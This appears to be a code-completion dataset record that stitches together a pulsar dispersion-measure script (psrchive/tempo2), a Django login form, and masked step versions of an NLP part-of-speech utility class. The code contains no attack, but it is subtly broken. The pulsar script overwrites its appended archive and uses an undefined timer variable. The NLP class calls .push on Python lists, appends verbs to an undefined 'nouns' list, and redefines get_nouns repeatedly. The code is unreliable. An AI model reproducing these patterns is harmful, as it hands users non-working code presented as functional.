default=1,\n\t\t\t\t\thelp='Factor to scrunch the number of channels for '+ \n\t\t\t\t\t 'band5 GMRT data (Def: 1)')\nparser.add_argument('-w','--writeout', action='store_true',\n\t\t\t\t\thelp='Writes out the DM corrected file. Def: False')\nparser.add_argument('-ptoa','--print_toas', action='store_true',\n\t\t\t\t\thelp='Print the prefit ToAs to file in tempo2 format. '+\n\t\t\t\t\t 'Def: False')\nparser.add_argument('-F','--Fscrunch', action='store_true',\n\t\t\t\t\thelp='Fully scrunch the number of channels for the '+\n\t\t\t\t\t\t 'final output archive (Def: False)')\nparser.add_argument('-T','--Tscrunch', action='store_true',\n\t\t\t\t\thelp='Completely time scrunch all the integrations')\nparser.add_argument('-t','--tscrunch', type=int, default=1,\n\t\t\t\t\thelp='Factor to scrunch the number of integrations for '+ \n\t\t\t\t\t 'the final output archive (Def: None)')\nparser.add_argument('-o','--offset', type=float, default=0.670520675,\n\t\t\t\t\thelp='Offset to shift band 5 ToAs (in secs)')\nparser.add_argument('-q', '--quiet', action='store_true', \n\t\t\t\t\t\t\thelp='Only print warnings')\n\n\ndef main():\n\t\n\t# parses the input arguments\n\targs = parser.parse_args()\n\n\t# checks status of quiet and ptoa\n\tquiet=False\n\tif args.quiet:\n\t\tquiet=True\n\ttempo2=True\n\tptoa=False\n\tif args.print_toas:\n\t\tptoa=True\n\t\t\n\tif not quiet:\n\t\tprint(\"Loading the archive files for DM estimation\")\n\n\t# loads the psrfits file\n\tarchives = []\n\tfor filename in args.files:\n\t\tarchives.append(psrchive.Archive_load(filename))\n\tnarch = len(archives)\n\tif narch >= 1:\n\t\tif not quiet:\n\t\t\tprint(\"Appending the archives ...\"),\n\t\t# append data\n\t\tar = freq_appendData(narch, archives, args.offset, \n\t\t\t\t\t\t\targs.b3fscrunch, args.b5fscrunch)\n\t\tif not quiet:\n\t\t\tprint(\" done!\")\n\telse:\n\t\tif not quiet:\n\t\t\tprint(\"Only one archive was given, so nothing to frequency-append.\")\n\t# ar is the final archive after performing frequency append\n\tar = archives[0]\n\tdel archives\n\t\n\t# extracts relevant information from the archive\n\tar_psr = ar.get_source()\n\tar_nbins = ar.get_nbin()\n\tar_tel = ar.get_telescope()\n\tmjd_start=ar.get_Integration(0).get_start_time().in_days()\n\tmjd_end=ar.get_Integration(0).get_end_time().in_days()\n\tar_mjd = mjd_start + (mjd_end-mjd_start)/2.\n\tlength = ar.integration_length()\n\tar.update_centre_frequency()\n\tar_centfr = ar.get_centre_frequency()\n\tar_nchan = ar.get_nchan()\n\tar_bw = ar.get_bandwidth()\n\tar_chnwdth = ar_bw / ar_nchan\n\tffrac = args.fscrunch\n\tif not quiet:\n\t\tprint(\"\\nNow preparing for DM estimation\\n\")\n\n\tpwd=os.getcwd()\n\n\t# checks for ephemeris file and exit if not given or is not available\n\t# in the default directory \"PWD/ephemerides\".\n\tif args.ephem != None:\n\t\tephemeris = args.ephem\n\telse:\n\t\tephemeris = \"ephemerides/\"+ar_psr+\".par\"\n\t\tif not (os.path.exists(ephemeris)):\n\t\t\tsys.exit(1)\n\tif not quiet:\n\t\tprint (\"\\nEphemeris file is:\"+ephemeris+'\\n')\n\t\n\t# if template is given as input argument load and process them\n\tmodel = []\n\tfor filename in args.model:\n\t\tmodel.append(psrchive.Archive_load(filename))\n\tif args.model != None:\n\t\tif len(args.model) == 1:\n\t\t\tmodel = freq_appendModel(1,model,args.offset, args.b3fscrunch, args.b5fscrunch)\n\t\tif len(args.model) > 1:\n\t\t\tmodel = freq_appendModel(1,model,args.offset, args.b3fscrunch, args.b5fscrunch)\n\t# If the template is not given, looking for a matching template in the templates directory\n\tif args.model == None:\n\t\tif not quiet:\n\t\t\tprint(\"Looking for matching template in templates directory...\"),\n\t\timport subprocess\n\t\ttempdir=\"templates/*.sm\"\n\t\ttempfile=ar_psr+'_tmp.txt'\n\t\ta=subprocess.call(\"psredit -c name,nbin,bw,nchan,freq -Q '%s' > '%s'\"\n\t\t\t\t\t\t\t % (tempdir,tempfile), shell=True)\n\n\t\ttempnchan=\"\"\n\t\tt1=str(ar_nbins)\n\t\tif ar_tel=='gmrt':\n\t\t\tt2=str(int(ar_bw))\n\t\telse:\n\t\t\tt2=str((ar_bw))\n\t\tt3=('%.2f'%ar_centfr)\n\t\tf = open(tempfile,'r')\n\t\tfor line in f:\n\t\t\tline = line.strip()\n\t\t\tcolumns=line.split()\n\t\t\tt4 = float(columns[5])\n\t\t\tt4 = ('%.2f'%t4)\n\t\t\tif ar_tel=='gmrt':\n\t\t\t\tif (columns[1]==ar_psr and columns[2]==t1 and str(int(columns[3]))==t2 and t4==t3):\n\t\t\t\t\tmodeltempl=columns[0]\n\t\t\t\t\ttempnchan=columns[4]\n\t\t\t\t\tif not quiet:\n\t\t\t\t\t\tprint (' done\\n')\n\t\t\telse:\n\t\t\t\tif (columns[1]==ar_psr and columns[2]==t1 and str((columns[3]))==t2 and t4==t3):\n\t\t\t\t\tmodeltempl=columns[0]\n\t\t\t\t\ttempnchan=columns[4]\n\t\t\t\t\tif not quiet:\n\t\t\t\t\t\tprint (' done\\n')\n\t\tif modeltempl=='' and tempnchan=='':\n\t\t\t\n\t\t\tprint(\"\\n** No matching template found for DM fitting. Exiting. **\\n\")\n\t\t\tsys.exit(1)\n\t\tf.close()\n\t\tos.remove(tempfile)\n\t\tif not quiet:\n\t\t\tprint(\"Found matching template: \"+modeltempl)\n\t\tmodel.append(psrchive.Archive_load(modeltempl))\n\tif not quiet:\n\t\tprint(\"\\nEstimating the DM from the observation\")\n\tmodel.update_centre_frequency()\n\n\t# cloning the original file for passing to DMCalc() routine\n\tarch = ar.clone()\n\n\t# Calling the DM estimation routine\t\n\tdmval, dmverr, fitchisq, pre_rms, post_rms, ToA_Err = DMCalc(arch, ar_nchan, ar_centfr, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t ar_bw, ar_psr, ar_tel, ar_mjd, model, \n\t\t\t\t\t\t\t\t\t \t\t\t\t\t ephemeris, pwd, ffrac, quiet, tempo2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t ptoa, narch)\n\t\n\t# writing out the final DM corrected file, if requested\n\tif args.writeout:\n\t\t# removing the DM and DMEPOCH from the ephemeris file for uptation\n\t\tinfile = open(ephemeris,\"r\")\n\t\ttmpeph = ar_psr+'.eph'\n\t\toutput = open(tmpeph,\"w+\")\n\t\tfor i, line in enumerate(infile):\n\t\t\tif not line.lstrip().startswith('DM'):\n\t\t\t\t\tif not line.lstrip().startswith('DMEPOCH'):\n\t\t\t\t\t\toutput.write(line)\n\t\tinfile.close()\n\t\toutput.close()\n\t\t# updating the ephemeris file with measured DM\n\t\tdmline = \"DM\t\t\t \"+str(dmval)+\"\\t\\t\"+str(dmverr)\n\t\tdmepochline = \"DMEPOCH\t\t \"+str(round(ar_mjd,2))\n\t\tif not args.quiet:\n\t\t\tprint(\"Updating the ephemeris with new DM... \"),\n\t\tf = open(tmpeph,'a')\n\t\tf.write(\"%s\\n %s\\n\" % (dmline, dmepochline))\n\t\tif not args.quiet:\n\t\t\tprint(\" done!\")\n\t\tf.close()\n\n\t\t# updating the ephemeris in the archive with the measured DM\n\t\tif not quiet:\n\t\t\tprint(\"Correcting the DM of the observed file and writing it out... \"),\n\t\tos.remove(tmpeph)\n\t\t# creating the directory for writing the file\n\t\tdirfinal=os.path.join(pwd,ar_psr+\"_\"+ar_tel+\"_final\")\n\t\tif not os.path.exists(dirfinal):\n\t\t\tos.makedirs(dirfinal)\n\t\t# filename with path of the DM corrected file\n\t\toutfile = dirfinal+\"/\"+ar_psr + \"_\" + str(ar_mjd) + \"_\" + ar_tel + \".ar\"\n\n\t\t# Setting the DMC flag to 1. In other words, doing the DM correction.\n\t\tar.set_dispersion_measure(dmval)\n\t\tar.dedisperse()\n\t\t# Performing different scrunching in the archive for writing out\n\t\tif not args.Tscrunch:\n\t\t\tar.tscrunch(args.tscrunch)\n\t\telse:\n\t\t\tar.tscrunch()\n\t\tif not args.Fscrunch:\n\t\t\tar.fscrunch(ffrac)\n\t\telse:\n\t\t\tar.fscrunch()\n\t\t# Writing out the DM corrected, time/frequency scrunched file.\n\t\tar.unload(outfile)\n\t\tif not args.quiet:\n\t\t\tprint(\" done!\")\n\t\tdel ar\n\t\tif not quiet:\n\t\t\tprint(\"The file is corrected for DM and is written out to\\n\"+outfile)\n\t# Printing the results to the file and also in the terminal\n\tf= open(ar_psr+\"_DM_timeseries.txt\",'a')\n\tf.write('%s %.4f %.6f %.6f %.2f %.4f %.4f %.4f %.2f %.2f %s\\n' %( filename, \\\n\t\t\tar_mjd, dmval, dmverr, fitchisq, pre_rms, post_rms, ToA_Err, ar_centfr, \\\n\t\t\tar_bw, ar_tel))\n\tf.close()\n\n\timport time\n\tend = time.time()\n\ttotal = end - start\n\tprint ('-----------------------------------------------------------------------------')\n\tprint ('MJD\\t\\tDM\\t\\tDMerr\\t\\tChisq\\tC_Fr\\tBW\\tTel')\n\tprint ('%.6f\\t%.6f\\t%.6f\\t%.2f\\t%.1f\\t%.1f\\t%s' % (ar_mjd, dmval, dmverr, \n\t\t\tfitchisq, ar_centfr, ar_bw, ar_tel) )\n\t\n\tprint ('-----------------------------------------------------------------------------')\n\n\tprint(\"\\nThe program took %.1f seconds to finish\"%total)\n#-------------------------------------------------------------------------------------------#\n\n''' Main function that performs the DM estimation '''\ndef DMCalc(ar, ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model, ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch): \n\t# Checks if model file is available.\n\tif model == None:\n\t\tsys.exit(1)\n\tinit_dm = ar.get_dispersion_measure()\n\t# setting up the ToA estimation routine using the psrchive ArrivalTime()\n\tif not quiet:\n\t\tprint(\"Using the ArrivalTime (pat) with PGS in Tempo2 format\")\n\tarrtim = psrchive.ArrivalTime()\n\tarrtim.set_shift_estimator('PGS')\n\tarrtim.set_format('Tempo2')\n\tarrtim.set_format_flags('IPTA')\n\tif not quiet:\n\t\tprint(\"Loading the template file for processing... \"),\n\tstd = model.clone()\n\tstd.pscrunch()\n\tstd.tscrunch()\n\tstd_nchan = std.get_nchan()\n\t\n\tstd.dedisperse()\n\tstd.fscrunch(ffrac)\n\tarrtim.set_standard(std)\n\tif not quiet:\n\t\tprint(\" done!\")\n\tar.fscrunch(ffrac)\n\tar.pscrunch()\n\tar.tscrunch()\n\tarrtim.set_observation(ar)\n\tif not quiet:\n\t\tprint(\"Finding the ToAs... \"),\n\n\t# Finding the ToAs and reading it into numpy arrays\n\ttoas = arrtim.get_toas()\n\ttoas_filtered = [x.split()[:5] for x in toas] \n\tstr_filename,str_freq,str_mjd,str_toaErr,str_site = zip(*toas_filtered)\n\tfreq = np.asarray(str_freq, dtype=np.float64)\n\tamjd = np.asarray(str_mjd, dtype=np.float64)\n\tterr = np.asarray(str_toaErr, dtype=np.float64)\n\tif not quiet:\n\t\tprint(\" done!\")\n\t\tprint(\"Removing the bad ToAs using Huber Regression... \"),\n\t# removing the ToAs with zero errors\n\tcondition1 = terr < 3*np.median(terr)\n\tfreqnew = np.extract(condition1,freq)\n\tamjdnew = np.extract(condition1,amjd)\n\tterrnew = np.extract(condition1,terr)\n\t# writing the ToAs to a temporary file for getting the non-phase resolved ToAs using general2\n\ttempfile = ar_psr+\"_tmp.txt\"\n\tf = open(tempfile,\"w+\")\n\thead=\"FORMAT 1\\n\"\n\tf.write('%s' % head)\n\tfor i in range(0,np.size(freqnew)):\n\t\tf.write('%s %.12f %.20f %.8f %s\\n' % \n\t\t\t\t(str_filename[0], freqnew[i], amjdnew[i], terrnew[i], str_site[0]))\n\tf.close()\n\ttmpstr=\"tempo2 -output general2 -f\"\n\ttmp = os.popen(tmpstr+\" %s %s -s \\\"1111111 {freq} {pre} {err}\\n\\\" | grep '1111111'\" %\n\t\t\t\t\t (ephemeris,tempfile)).read()\n\tos.remove(tempfile)\n\n\t# extracting the data from general2 output\n\ttmp1 = tmp.split('\\n')\n\tfreqtmp = np.zeros(np.size(amjdnew))\n\ttoastmp = np.zeros(np.size(amjdnew))\n\tTErrtmp = np.zeros(np.size(amjdnew))\n\tfor i in range(np.size(amjdnew)):\n\t\t_,freqtmp[i],toastmp[i],TErrtmp[i] = (tmp1[i].split())\n\tTErrtmp /= 1e+6\n\t# importing libraries for outlier removal\n\tfrom sklearn import linear_model\n\tfrom sklearn.linear_model import HuberRegressor\n\tfrom sklearn.preprocessing import PolynomialFeatures\n\tfrom sklearn.pipeline import make_pipeline\n\t# changing the shape of frequency array\n\tfreqarr = freqtmp.reshape(-1,1)\n\t# making a nu^2 model and fitting using Huber Regression\n\ttoastmp *= 1e+6\n\ttoashift = (np.min(toastmp)*-1.5)\n\ttoastmp += toashift\n\tTerrtmp = TErrtmp*1e+6\n\tmodel = make_pipeline(PolynomialFeatures(2), HuberRegressor())\n\tmodel.fit(freqarr,toastmp,\n\t\t\t huberregressor__sample_weight=np.ravel(1./Terrtmp))\n\ty_pred = model.predict(freqarr)\n\tresiduals = toastmp - y_pred\n\tmedian = np.median(residuals)\n\tMAD = np.median(np.abs(residuals-np.median(residuals)))/0.6744897501960817\n\t# filtering the good ToAs\n\tcondition2 = (residuals > median - 3*MAD) & (residuals < median + 3*MAD)\n\tfreqf = np.around(np.extract(condition2,freqarr),3)\n\tamjdf = np.extract(condition2,amjdnew)\n\ttoasf = np.extract(condition2,toastmp)\n\tterrf = np.extract(condition2,TErrtmp)\n\tprefit_rms = np.sqrt(np.cov(toasf, aweights=terrf))\n\t\n\tterrf *= 1e+6\n\tif not quiet:\n\t\tprint(\" done!\")\n\t# writing out the ToAs in proper format\n\tif ptoa:\n\t\tif not quiet:\n\t\t\tprint ('Writing out ToAs into a file in tempo2 format'),\n\t\tdirtoas=os.path.join(pwd,ar_psr+\"_\"+ar_tel+\"_ToAs\")\n\t\tif not os.path.exists(dirtoas):\n\t\t os.makedirs(dirtoas)\n\t\toutfile=dirtoas+\"/\"+ar_psr+\"_\"+str(ar_mjd)+\"_\"+ar_tel+\"_ToAs.txt\"\n\t\tf = open(outfile,\"w+\")\n\t\thead=\"FORMAT 1\"\n\t\tf.write('%s\\n' % head)\n\t\tfor i in range(0,np.size(freqf)):\n\t\t\tf.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i], amjdf[i], terrf[i], str_site[0]))\n\t\tf.close()\n\t\tif not quiet:\n\t\t\tprint(\"done!\")\n\n\t# Fitting the ToAs with tempo2 for DM\n\tif not quiet:\n\t\tprint(\"\\nWriting the ToAs to a temporary file for tempo2 fitting...\"),\n\toutfiletmp=ar_psr+\"tmp_ToAs.txt\"\n\tf = open(outfiletmp,\"w+\")\n\thead=\"FORMAT 1\"\n\tf.write('%s\\n' % head)\n\tfor i in range(0,np.size(freqf)):\n\t\tf.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i], amjdf[i], terrf[i], str_site[0]))\n\tf.close()\n\tif not quiet:\n\t\tprint(\" done!\\n\")\n\t# performing the fit\n\tdmstr=os.popen(\"tempo2 -f %s %s -nofit -fit dm | grep 'DM (cm^-3 pc)'| awk \\'{print $5,$6}\\'\" \n\t\t\t\t\t% (ephemeris, outfiletmp)).read()\n\t(dm, dmerr) = dmstr.split()\n\tdmval = float(dm)\n\tdmverr = float(dmerr)\n\t# doing the fit again to read the chisquare\n\tchisqstr=os.popen(\"tempo2 -f %s %s -nofit -fit dm | grep 'Fit Chisq'| awk \\'{print $9}\\'\" \n\t\t\t\t\t% (ephemeris, outfiletmp)).read()\n\tfitchisq = float(chisqstr)\n\tos.remove(outfiletmp)\n\n\t# Preparing the data for plotting the residuals, prefit and postfit\n\tinfile = open(ephemeris,\"r\")\n\ttmpeph1 = ar_psr+'_tmpeph.eph'\n\toutput = open(tmpeph1,\"w+\")\n\tfor i, line in enumerate(infile):\n\t\tif not line.lstrip().startswith('DM'):\n\t\t\t\tif not line.lstrip().startswith('DMEPOCH'):\n\t\t\t\t\toutput.write(line)\n\tinfile.close()\n\toutput.close()\n\t# updating the ephemeris file with measured DM\n\tdmline = \"DM \"+str(dmval)+\"\\t1\\t\"+str(dmverr)\n\tdmepochline = \"DMEPOCH\t \"+str(round(ar_mjd,2))\n\tf = open(tmpeph1,'a')\n\tf.write('%s\\n%s\\n' % (dmline, dmepochline))\n\tf.close()\n\tnewarch = ar.clone()\n\tnewarch.tscrunch()\n\tnewarch.set_dispersion_measure(dmval)\n\tarrtim.set_observation(newarch)\n\tarrtim.set_standard(std)\n\ttoas1 = arrtim.get_toas()\n\ttoas1_filtered = [x.split()[:5] for x in toas1] \n\tstr_filename1,str_freq1,str_mjd1,str_toaErr1,str_site1 = zip(*toas1_filtered)\n\tfreq1 = np.asarray(str_freq1, dtype=np.float64)\n\tamjd1 = np.asarray(str_mjd1, dtype=np.float64)\n\tterr1 = np.asarray(str_toaErr1, dtype=np.float64)\n\tfreqnew1 = np.extract(condition1,freq1)\n\tamjdnew1 = np.extract(condition1,amjd1)\n\tterrnew1 = np.extract(condition1,terr1)\n\ttempfile1 = ar_psr+\"_tmp1.txt\"\n\tf = open(tempfile1,\"w+\")\n\thead=\"FORMAT 1\\n\"\n\tf.write('%s' % head)\n\tfor i in range(0,np.size(freqnew1)):\n\t\tf.write('%s %.12f %.20f %.8f %s\\n' % (str_filename1[0], freqnew1[i], amjdnew1[i], terrnew1[i], str_site1[0]))\n\tf.close()\n\n\ttmp2 = os.popen(\"tempo2 -output general2 -f %s %s -s \\\"1111111 {freq} {pre} {err}\\n\\\" | grep '1111111'\" \n\t\t\t\t\t% (tmpeph1,tempfile1)).read()\n\tos.remove(tempfile1)\n\tos.remove(tmpeph1)\n\t# extracting the data from general2 output\n\ttmp3 = tmp2.split('\\n')\n\tfreqtmp2 = np.zeros(np.size(amjdnew1))\n\ttoastmp2 = np.zeros(np.size(amjdnew1))\n\tTErrtmp2 = np.zeros(np.size(amjdnew1))\n\tfor i in range(np.size(amjdnew1)):\n\t\t_,freqtmp2[i],toastmp2[i],TErrtmp2[i] = (tmp3[i].split())\n\tfreqf1 = np.around(np.extract(condition2,freqtmp2),3)\n\tamjdf1 = np.extract(condition2,amjdnew1)\n\ttoasf1 = np.extract(condition2,toastmp2)\n\tterrf1 = np.extract(condition2,TErrtmp2)\n\ttoasf1 *= 1e+6\n\tpostfit_rms = np.sqrt(np.cov(toasf1, aweights=terrf1))\n\tar_nbin = newarch.get_nbin()\n\tar_nchn = newarch.get_nchan()\n\tif (narch == 1):\n\t\tfreq_bot = (ar.get_centre_frequency() - ar_bw/2.0)\n\t\tfreq_top = (ar.get_centre_frequency() + ar_bw/2.0)\n\tif (narch > 1):\n\t\tif (ar_bw == 200.):\n\t\t\tfreq_bot = 400.0\n\t\t\tfreq_top = 1460.0\n\t\tif (ar_bw == 400.):\n\t\t\tfreq_bot = 300.0\n\t\t\tfreq_top = 1460.0\n\t# Getting the profile data for plotting\n\tnewarch.dedisperse()\n\tnewarch.remove_baseline()\n\tprofdata2D = newarch.get_data()[:,0,:,:].flatten().reshape(ar_nchn,ar_nbin)\n\tprof = newarch.clone()\n\tprof.fscrunch()\n\tprofdata1D = prof.get_data().flatten()\n\tprofdata1D /= np.max(profdata1D)\n\tresidDM = init_dm - dmval\n\tdmcurve = 4.15 * 1000. * residDM * ( (1./(np.min(freqf)/1000.)**2) - (1./(freqf/1000.)**2) )\n\tdmoff = np.median(toasf) - np.median(dmcurve)\n\tdmcurve += dmoff\n\t# Now does the actual plotting\t\n\tfig = plt.figure(3, figsize=(8, 6))\n\tfig.subplots_adjust(hspace=0.05)\n\tax0 = plt.subplot2grid((3, 8), (0,0), rowspan=2, colspan=3)\n\tax1 = plt.subplot2grid((3, 8), (2,0), rowspan=1, colspan=3)\n\tax2 = plt.subplot2grid((3, 8), (0,4), colspan=4)\n\tax3 = plt.subplot2grid((3, 8), (1,4), colspan=4)\n\tax4 = plt.subplot2grid((3, 8), (2,4), colspan=4)\n\tax0.imshow((np.sqrt(profdata2D**2))**0.5, origin='lower', extent=(0,ar_nbin-1,freq_bot,freq_top), aspect='auto', cmap='hot')\n\tax0.set_ylabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n\tax0.tick_params(axis='x', which='both', bottom=True, top=True, \n\t\t\tlabelbottom=False)\n\tax1.plot(np.arange(ar_nbin, dtype=float),profdata1D, color='black', linewidth=0.5)\n\tax1.set_xlim(0,ar_nbin-1)\n\tax1.set_xlabel('Pulse Phase (bins)', fontweight='bold', fontsize=12)\n\tax1.set_ylabel('Intensity', fontweight='bold', fontsize=12)\n\tax2.errorbar(freqtmp, toastmp, yerr=Terrtmp,fmt='.', color='gray', label='Prefit: Unfiltered', capsize=2)\n\tax2.plot(freqtmp, y_pred,'--r', label='Polynomial Fit')\n\tax2.set_xlim(freq_bot, freq_top)\n\tax2.grid()\n\tax2.legend(loc='upper right')\n\tax2.axes.xaxis.set_ticklabels([])\n\tax3.yaxis.set_label_position(\"right\")\n\tax3.errorbar(freqf, toasf-np.median(toasf), terrf,fmt='.k', label='Prefit: Filtered', capsize=2)\n\tax3.set_xlim(freq_bot, freq_top)\n\tax3.grid()\n\tax3.legend(loc='upper right')\n\tax3.axes.xaxis.set_ticklabels([])\n\tax3.set_ylabel(r'ToA Residuals ($\\mu$s)', fontweight='bold', fontsize=12)\n\tax4.errorbar(freqf1, toasf1-np.median(toasf1), terrf1, fmt='.r', label='Postfit', capsize=2)\n\tax4.set_xlim(freq_bot, freq_top)\n\tax4.grid()\n\tax4.legend(loc='upper right')\n\tax4.set_xlabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n\tfig.suptitle('Source: PSR %s; MJD: %.4f; Prefit Wrms: %.2f $\\mu$s; Postfit Wrms: %.2f $\\mu$s\\nMedian ToA Err: %.2f $\\mu$s; DM: %.6f $\\pm$ %.6f pc cm$^{-3}$; Reduced $\\chi^2$: %.2f' % (ar.get_source(), ar_mjd, prefit_rms, postfit_rms, np.median(terrf1), dmval, dmverr, fitchisq), fontsize=11, fontweight='bold')\n\tdirplot=os.path.join(pwd,ar_psr+\"_\"+ar_tel+\"_plots\")\n\tif not os.path.exists(dirplot):\n\t os.makedirs(dirplot)\n\tplotfile=dirplot+\"/\"+ar_psr+\"_\"+str(ar_mjd)+\"_\"+str(ar_centfr)+\"_\"+ar_tel+\"_DMfitResid.pdf\"\n\tplt.savefig(plotfile, format='pdf')\n\tplt.close()\n\tif not quiet:\n\t\tprint ('done!')\n\tdel ar\n\treturn(dmval, dmverr, fitchisq, prefit_rms, postfit_rms, np.median(terrf1))\n\n\n''' Frequency appending the data archives '''\ndef freq_appendData(narch, archives, offset, b3scrunch, b5scrunch):\n\n\tfor i in range(narch):\n\t\tarchives[i].tscrunch()\n\t# GMRT specific Jump. This is not ideal, as these jumps calculated by tempo2 \n\t# will be dependent on the pulsar period. Default values of this jump given \n\t# is from the timing of PSR J1643-1224. \n\t# PS: this jump is valid for only cycle 37 dataset (or the given MJD limits).\n\tif (archives[0].get_telescope() == 'GMRT'):\n\t\tfor i in range(narch):\n\t\t\tar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n\t\t\tar_frq = archives[i].get_centre_frequency()\n\t\t\tar_bw = archives[i].get_bandwidth()\n\t\t\tperiod = (archives[i].get_Integration(0).get_folding_period())\n\t\t\toffset = 0.670520675\n\t\t\tjump = (offset/period) - int(offset/period)\n\t\t\tif (ar_frq >= 1260. and ar_frq < 1460.):\n\t\t\t\tif (ar_mjd >=58810. and ar_mjd < 58991.):\n\t\t\t\t\tarchives[i].rotate_phase(-jump)\n\tfreq_append = psrchive.FrequencyAppend()\n\tttfreq = archives[0].get_centre_frequency()\n\tif (300. < ttfreq < 500.):\n\t\tarchives[0].fscrunch(b3scrunch)\n\tif (1160. < ttfreq < 1460.):\n\t\tarchives[0].fscrunch(b5scrunch)\n\n\tfreq_append.init(archives[0])\n\twhile len(archives) > 1:\n\t\tttfreq = archives[1].get_centre_frequency()\n\t\tif (300. < ttfreq < 500.):\n\t\t\tarchives[1].fscrunch(b3scrunch)\n\t\tif (1160. < ttfreq < 1460.):\n\t\t\tarchives[1].fscrunch(b5scrunch)\n\t\t\n\t\tfreq_append.append(archives[0],archives[1])\n\t\tdel archives[1]\n\treturn(archives[0])\n\n''' Frequency Appending the Templates '''\ndef freq_appendModel(narch, archives, offset, b3scrunch, b5scrunch):\n\n\tfor i in range(narch):\n\t\tarchives[i].tscrunch()\n\t# GMRT specific Jump. This is not ideal, as these jumps calculated by tempo2 \n\t# will be dependent on the pulsar period. Default values of this jump given \n\t# is from the timing of PSR J1643-1224. \n\t# PS: this jump is valid for only cycle 37 dataset (or the given MJD limits).\n\tif (archives[0].get_telescope() == 'GMRT'):\n\t\tfor i in range(narch):\n\t\t\tar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n\t\t\tar_frq = archives[i].get_centre_frequency()\n\t\t\tar_bw = archives[i].get_bandwidth()\n\t\t\tperiod = (archives[i].get_Integration(0).get_folding_period())\n\t\t\toffset = 0.670520675\n\t\t\tjump = (offset/period) - int(offset/period)\n\t\t\tif (ar_frq >= 1260. and ar_frq < 1460.):\n\t\t\t\tif (ar_mjd >=58810. and ar_mjd < 58991.):\n\t\t\t\t\tarchives[i].rotate_phase(-jump)\n\n\tfreq_append = psrchive.FrequencyAppend()\n\tttfreq = archives[0].get_centre_frequency()\n\tif (300. < ttfreq < 500.):\n\t\tarchives[0].fscrunch(b3scrunch)\n\tif (1160. < ttfreq < 1460.):\n\t\tarchives[0].fscrunch(b5scrunch)\n\tfreq_append.init(archives[0])\n\twhile len(archives) > 1:\n\t\tttfreq = archives[1].get_centre_frequency()\n\t\tif (300. < ttfreq < 500.):\n\t\t\tarchives[1].fscrunch(b3scrunch)\n\t\tif (1160. < ttfreq < 1460.):\n\t\t\tarchives[1].fscrunch(b5scrunch)\n\t\tfreq_append.append(archives[0],archives[1])\n\t\tdel archives[1]\n\treturn(archives[0])\n\n#----------------------------------------------------------------------------------#\n\nmain()\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from django import forms
class LoginForm(forms.Form):
usuario=forms.CharField(label="Usuario",max_length=20, required=True, widget=forms.TextInput(
attrs={'class':'form-control'}
))
contraseña=forms.CharField(label="Contraseña",max_length=20, widget=forms.PasswordInput(
attrs={'class':'form-control'}
))
|
normal
|
{
"blob_id": "7da5a7476c807619bed805cb892774c23c04c6f7",
"index": 4917,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass LoginForm(forms.Form):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass LoginForm(forms.Form):\n usuario = forms.CharField(label='Usuario', max_length=20, required=True,\n widget=forms.TextInput(attrs={'class': 'form-control'}))\n contraseña = forms.CharField(label='Contraseña', max_length=20, widget=\n forms.PasswordInput(attrs={'class': 'form-control'}))\n",
"step-4": "from django import forms\n\n\nclass LoginForm(forms.Form):\n usuario = forms.CharField(label='Usuario', max_length=20, required=True,\n widget=forms.TextInput(attrs={'class': 'form-control'}))\n contraseña = forms.CharField(label='Contraseña', max_length=20, widget=\n forms.PasswordInput(attrs={'class': 'form-control'}))\n",
"step-5": "from django import forms\n\nclass LoginForm(forms.Form):\n usuario=forms.CharField(label=\"Usuario\",max_length=20, required=True, widget=forms.TextInput(\n attrs={'class':'form-control'} \n ))\n contraseña=forms.CharField(label=\"Contraseña\",max_length=20, widget=forms.PasswordInput(\n attrs={'class':'form-control'}\n ))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
class NlpUtility():
"""
Utility methods to get particular parts of speech from a token set
"""
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == "NN":
nouns.push(word)
def get_verbs(self, tokens):
verbs = []
for word, pos in tokens:
if pos == "VB":
nouns.push(word)
def get_adjectives(self, tokens):
nouns = []
for word, pos in tokens:
if pos == "NN":
nouns.push(word)
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == "NN":
nouns.push(word)
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == "NN":
nouns.push(word)
|
normal
|
{
"blob_id": "c6502ea2b32ad90c76b6dfaf3ee3218d029eba15",
"index": 56,
"step-1": "class NlpUtility:\n <mask token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n <mask token>\n <mask token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n",
"step-2": "class NlpUtility:\n <mask token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_verbs(self, tokens):\n verbs = []\n for word, pos in tokens:\n if pos == 'VB':\n nouns.push(word)\n <mask token>\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n",
